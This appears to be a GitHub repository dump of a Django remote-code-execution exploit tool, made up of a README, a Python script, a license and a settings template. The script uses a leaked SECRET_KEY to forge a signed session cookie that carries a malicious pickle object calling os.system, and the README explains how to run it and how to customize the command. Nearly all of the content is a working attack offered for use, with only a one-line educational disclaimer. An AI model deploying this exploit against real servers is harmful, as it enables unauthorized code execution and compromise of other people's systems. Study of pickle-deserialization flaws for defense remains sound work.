├── LICENSE ├── README.md ├── exploit.py ├── requirements.txt └── settings.json /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2024 Spix0r 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Django Pickle RCE Exploit Tool 2 | 3 | This tool exploits Django's use of `PickleSerializer` for session cookies, enabling remote code execution (RCE) through a forged cookie. 4 | 5 | ## Prerequisites 6 | 7 | - Python 3.x 8 | - Django installed 9 | - Knowledge of the target system’s Django settings, specifically the `SECRET_KEY` and a valid cookie. 10 | 11 | ## How It Works 12 | 13 | The exploit works by: 14 | 15 | 1. Extracting the `SECRET_KEY` and a valid session cookie from the target Django project’s settings. 16 | 2. Forging a new session cookie that contains a malicious Pickle object. 17 | 3. The malicious payload (`PickleRce`) executes a system command when the server deserializes the cookie. 18 | 19 | ### Exploit Flow: 20 | 21 | - **Step 1:** Load Django settings from a `settings.json` file. 22 | - **Step 2:** Extract the `SECRET_KEY` and the target session cookie. 23 | - **Step 3:** Deserialize the cookie, inject a malicious Pickle payload (`PickleRce`), and re-serialize it. 24 | - **Step 4:** Output the forged session cookie, which can be used to trigger the payload. 25 | 26 | ## Usage 27 | 28 | 1. Clone the repository: 29 | 30 | ```bash 31 | git clone https://github.com/Spix0r/django-rce-exploit.git 32 | cd django-rce-exploit 33 | ``` 34 | 35 | 2. Prepare your `settings.json` file with the following format: 36 | 37 | ```json 38 | { 39 | "settings": [ 40 | { 41 | "SECRET_KEY": "your_secret_key", 42 | "Sites_COOKIE": "your_cookie_value" 43 | } 44 | ] 45 | } 46 | ``` 47 | 48 | - Replace `"your_secret_key"` with the target Django application's secret key. 49 | - Replace `"your_cookie_value"` with the cookie you want to forge. 50 | 51 | 3. Run the exploit: 52 | 53 | ```bash 54 | python3 exploit.py 55 | ``` 56 | 57 | If successful, the script will output a forged cookie that can be used to trigger remote code execution. 58 | 59 | ## Example 60 | 61 | ```bash 62 | Forged cookie: 63 | gAJ9cQAoWAMAAAB0ZXN0Y29va2llcQFLAUsALg== 64 | ``` 65 | 66 | You can then send this forged cookie to the Django server to trigger the command injection. 67 | 68 | ## Customizing the Exploit 69 | 70 | By default, the payload executes the command `"YOUR OS COMMAND HERE"`. To customize this, modify the `PickleRce` class in the script: 71 | 72 | ```python 73 | class PickleRce(object): 74 | def __reduce__(self): 75 | return (os.system,('YOUR_OS_COMMAND',)) 76 | ``` 77 | 78 | ## Disclaimer 79 | 80 | This tool is for educational purposes only. Use it responsibly and only on systems you have permission to test. 81 | 82 | ## License 83 | 84 | This project is licensed under the MIT License. 85 | -------------------------------------------------------------------------------- /exploit.py: -------------------------------------------------------------------------------- 1 | import django.core.signing, django.contrib.sessions.serializers,pickle,os,sys,json 2 | from django.http import HttpResponse 3 | 4 | class PickleRce(object): 5 | def __reduce__(self): 6 | return (os.system,('YOUR OS COMMAND HERE',)) 7 | 8 | os.system('django-admin startproject exploit && mv exploit/exploit/settings.py . && rm -rf exploit') 9 | 10 | with open("settings.json","r") as settings: 11 | data = json.load(settings) 12 | SECRET_KEY=data['settings'][0]['SECRET_KEY'] 13 | cookie=data['settings'][0]['Sites_COOKIE'] 14 | 15 | try: 16 | os.environ["DJANGO_SETTINGS_MODULE"] = "settings" 17 | newContent = django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies') 18 | newContent['testcookie'] = PickleRce() 19 | 20 | cookie = django.core.signing.dumps(newContent,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies',compress=True) 21 | print("Forged cookie:\n" + cookie) 22 | except: 23 | print("an error occurred during forging process , please check settings.py path") 24 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | django 2 | -------------------------------------------------------------------------------- /settings.json: -------------------------------------------------------------------------------- 1 | { 2 | "settings":[ 3 | { 4 | "SECRET_KEY":"Leaked_SECRET_KEY", 5 | "Sites_COOKIE":"THE_SITES_COOKIE" 6 | } 7 | ] 8 | } 9 | --------------------------------------------------------------------------------